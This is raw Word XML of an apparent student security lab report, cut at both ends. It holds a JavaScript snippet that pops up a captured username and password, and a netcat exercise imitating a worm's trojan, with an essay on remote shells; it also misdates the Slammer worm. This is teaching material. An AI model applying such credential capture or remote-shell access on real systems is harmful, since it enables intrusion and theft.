          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>).value</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172D7689" w14:textId="77777777" w:rsidR="00746010" w:rsidRPr="00746010" w:rsidRDefault="00746010" w:rsidP="00746010">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:spacing w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="98C379"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>alert</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="E5C07B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"I got You. Don't leave comp unattended.</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="E5C07B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Username:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="E5C07B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="56B6C2"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>\n</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="E5C07B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Password:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="E06C75"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>password)</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46291A25" w14:textId="77777777" w:rsidR="00746010" w:rsidRPr="00746010" w:rsidRDefault="00746010" w:rsidP="00746010">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="282C34"/>
        <w:spacing w:after="0" w:line="270" w:lineRule="atLeast"/>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="BBBBBB"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
      <w:r w:rsidRPr="00746010">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsia="Times New Roman" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:color w:val="ABB2BF"/>
          <w:kern w:val="0"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D3729F" w14:textId="0F52623B" w:rsidR="00746010" w:rsidRPr="00466CEC" w:rsidRDefault="00981BCB" w:rsidP="00981BCB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Javascript</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB39787" w14:textId="7770E675" w:rsidR="00746010" w:rsidRPr="00466CEC" w:rsidRDefault="00746010" w:rsidP="000C77B7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="41460EB0" wp14:editId="6AB8BA9E">
            <wp:extent cx="4982159" cy="3240000"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="4554772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77266"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82159" cy="3240000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B0C6164" w14:textId="4B1D1B11" w:rsidR="00981BCB" w:rsidRPr="00466CEC" w:rsidRDefault="00981BCB" w:rsidP="00981BCB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Attack on console</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147AFF66" w14:textId="532F1FDF" w:rsidR="00746010" w:rsidRPr="00466CEC" w:rsidRDefault="00746010" w:rsidP="000C77B7">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="51E69EDA" wp14:editId="2D352427">
            <wp:extent cx="5408668" cy="3240000"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:docPr id="3352376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3768" name="Picture 2" descr="A screenshot of a computer&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId7" cstate="print">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="7885"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5408668" cy="3240000"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1086DDAE" w14:textId="2951F05A" w:rsidR="00CF6C7F" w:rsidRPr="00466CEC" w:rsidRDefault="00981BCB" w:rsidP="00981BCB">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A6D0DD" w14:textId="06DDCBE9" w:rsidR="00CF6C7F" w:rsidRPr="00466CEC" w:rsidRDefault="00CF6C7F" w:rsidP="00CF6C7F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>2. We will mimic an attack used by several worms for placing a trojan horse into your computer. Please note that it is for demonstration purposes only. Please do not abuse it. This attack is partly taken from the MSSQL SLAMMER worm that was spread in 2006.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F979A7" w14:textId="0863FE5A" w:rsidR="00503C53" w:rsidRPr="00466CEC" w:rsidRDefault="00503C53" w:rsidP="00CF6C7F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Ans:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419FA914" w14:textId="07211032" w:rsidR="00503C53" w:rsidRPr="00466CEC" w:rsidRDefault="00981BCB" w:rsidP="0008104A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2A9722FE" wp14:editId="03BEA7BA">
            <wp:extent cx="5943600" cy="684530"/>
            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
            <wp:docPr id="164837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72244" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="684530"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r w:rsidR="0008104A" w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
        <w:t>Victim</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1263A238" w14:textId="350ADAD6" w:rsidR="0008104A" w:rsidRPr="00466CEC" w:rsidRDefault="0008104A" w:rsidP="0008104A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7C7A0D52" wp14:editId="15531B98">
            <wp:extent cx="5943600" cy="4224655"/>
            <wp:effectExtent l="0" t="0" r="0" b="4445"/>
            <wp:docPr id="53906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67772" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId9"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4224655"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="618EEFA5" w14:textId="41149962" w:rsidR="00CF6C7F" w:rsidRPr="00466CEC" w:rsidRDefault="0008104A" w:rsidP="0008104A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Hacker</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09D9D1A5" w14:textId="77777777" w:rsidR="00BA14A2" w:rsidRPr="00466CEC" w:rsidRDefault="00CF6C7F" w:rsidP="00CF6C7F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Write an essay to summarize the lesson that you have learned in this activity. In particular, </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D34E6A" w14:textId="77777777" w:rsidR="00BA14A2" w:rsidRPr="00466CEC" w:rsidRDefault="00CF6C7F" w:rsidP="00BA14A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">a) explain the worst case scenario that can happen if you leave your computer unattended. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F07DE46" w14:textId="044C6BE1" w:rsidR="00B34FBF" w:rsidRPr="00466CEC" w:rsidRDefault="00CF6C7F" w:rsidP="00CF6C7F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>b) explain how a tool like netcat can be used for constructing a trojan horse. As a user, how will you prevent yourself from being a victim to such attacks?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D7A23F" w14:textId="77777777" w:rsidR="00466CEC" w:rsidRPr="00466CEC" w:rsidRDefault="007640CD" w:rsidP="00466CEC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Ans:</w:t>
      </w:r>
      <w:r w:rsidR="00466CEC" w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidR="00466CEC" w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Leaving a computer unattended, even for a short time, can lead to serious damage. An attacker could inject malicious JavaScript to steal login credentials or use tools like </w:t>
      </w:r>
      <w:r w:rsidR="00466CEC" w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsiaTheme="majorEastAsia" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Netcat</w:t>
      </w:r>
      <w:r w:rsidR="00466CEC" w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve"> to open a remote shell. This allows them to take full control of the system, access files, or install hidden malware.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36782507" w14:textId="77777777" w:rsidR="00466CEC" w:rsidRPr="00466CEC" w:rsidRDefault="00466CEC" w:rsidP="00466CEC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsiaTheme="majorEastAsia" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Worst Case Scenario:</w:t>
      </w:r>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
        <w:t>If your computer is left unlocked, an attacker might capture your usernames and passwords, install a trojan horse, or remotely control your machine. Sensitive personal or academic data can be stolen or destroyed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3144BA" w14:textId="77777777" w:rsidR="00466CEC" w:rsidRPr="00466CEC" w:rsidRDefault="00466CEC" w:rsidP="00466CEC">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="TH SarabunPSK" w:eastAsiaTheme="majorEastAsia" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>How Netcat can be used:</w:t>
      </w:r>
      <w:r w:rsidRPr="00466CEC">
        <w:rPr>
          <w:rFonts w:ascii="TH SarabunPSK" w:hAnsi="TH SarabunPSK" w:cs="TH SarabunPSK" w:hint="cs"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:br/>
